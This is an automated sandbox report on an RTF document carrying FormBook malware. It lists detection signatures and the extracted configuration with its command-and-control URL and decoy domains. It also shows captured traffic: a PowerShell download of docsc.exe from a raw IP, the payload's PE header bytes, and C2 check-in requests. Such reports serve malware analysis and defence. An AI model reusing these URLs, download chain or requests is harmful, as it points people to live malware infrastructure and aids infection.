Analysis Report 1c60a1e9_by_Libranalysis

Overview

General Information

Sample Name: 1c60a1e9_by_Libranalysis (renamed file extension from none to rtf)
Analysis ID: 412069
MD5: 1c60a1e972aaa5a3eb15c0adc2de7ead
SHA1: 921fed27f6b23f7f810ee03eeefb91634a295592
SHA256: 605e84b01e008da482a744feb468d9dd842148850fda1694a6772b6e38cc6c82

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office creates scripting files
Modifies the context of a thread in another process (thread injection)
Office process drops PE file
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: Non Interactive PowerShell
Sigma detected: PowerShell Download from URL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.rogegalmish.com/a8si/"], "decoy": ["mosquitocontrolpro.com", "omfgphil.com", "qqkit.net", "compusolutionsac.com", "skynetaccess.com", "helmetmoto.com", "webdomoupravitel.com", "thepocket-onlinelesson.xyz", "stefaniehirsch.space", "goalsandballs.com", "xn--bro-ba-3ya.com", "tomrings.com", "4520oceanviewavenue.com", "mamaebemorientada.com", "shopwreathrails.com", "restaurantestancia.com", "annaquatics.info", "mnarchitect.design", "best-cleaner.com", "jobhuizhan.com", "check-info-bank.network", "boostcoachingonline.com", "basimogroup.com", "076fb5.com", "conansr.icu", "numbereightturquoise.com", "southernbrushworks.com", "home-inland.com", "irrpa.com", "ethereumdailypay.com", "betsysellsswfl.com", "cutebyconstance.website", "modelsnt.com", "medifilt.com", "tracisolomon.xyz", "dchaulingdisposal.com", "minchenhy.com", "smart4earth.com", "rackembilliards.com", "benschiller-coaching.com", "virtualroasters.com", "applewholesales.com", "thesidspot.com", "grechenblogs.com", "marshlandlogisticsservices.net", "covidokotoks.com", "mirabilla.com", "hunab.tech", "foreverjsdesigns.com", "heipacc.info", "simon-schilling.com", "shirleyeluiz.com", "juguetibicicollectors.com", "70shousemanchester.com", "tranthaolinh.net", "urbanpokebar.com", "madras-spice.com", "fulmardelta.net", "drisu-goalkeeping.com", "jiotest.com", "vitatiensa.com", "melbournebusinesslawyers.net", "rajehomes.com", "company-for-you.com"]}
Multi AV Scanner detection for submitted file
Source: 1c60a1e9_by_Libranalysis.rtf ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\docsc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 12.2.docsc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: docsc[1].exe.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_001D1660
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_001D1577
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 10_2_001D16D8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 4x nop then pop ebx 12_2_00406A9A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop ebx 14_2_00086A9A
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.boostcoachingonline.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.rogegalmish.com/a8si/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.thepocket-onlinelesson.xyz
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 May 2021 09:33:33 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 12 May 2021 07:52:57 GMTETag: "edc00-5c21d4c824840"Accept-Ranges: bytesContent-Length: 973824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 
00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 May 2021 09:33:42 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 12 May 2021 07:52:57 GMTETag: "edc00-5c21d4c824840"Accept-Ranges: bytesContent-Length: 973824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 
00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Host: 157.55.173.72Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.applewholesales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1Host: www.southernbrushworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.betsysellsswfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1Host: www.ethereumdailypay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.foreverjsdesigns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 75.2.115.196 75.2.115.196
Source: Joe Sandbox View IP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.55.173.72Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 157.55.173.72
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmp
Source: unknown DNS traffic detected: queries for: www.boostcoachingonline.com
Source: powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.17
Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/go
Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/goose/do
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/goose/docsc
Source: powershell.exe, 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp String found in binary or memory: httP://157.55.173.72/goose/docsc.exe
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmp String found in binary or memory: httP://157.55.173.72/goose/docsc.exePE1
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp String found in binary or memory: http://157.55.173.72
Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2113476855.000000001BA55000.00000004.00000001.sdmp String found in binary or memory: http://157.55.173.72/goose/docsc.exe
Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://KK
Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
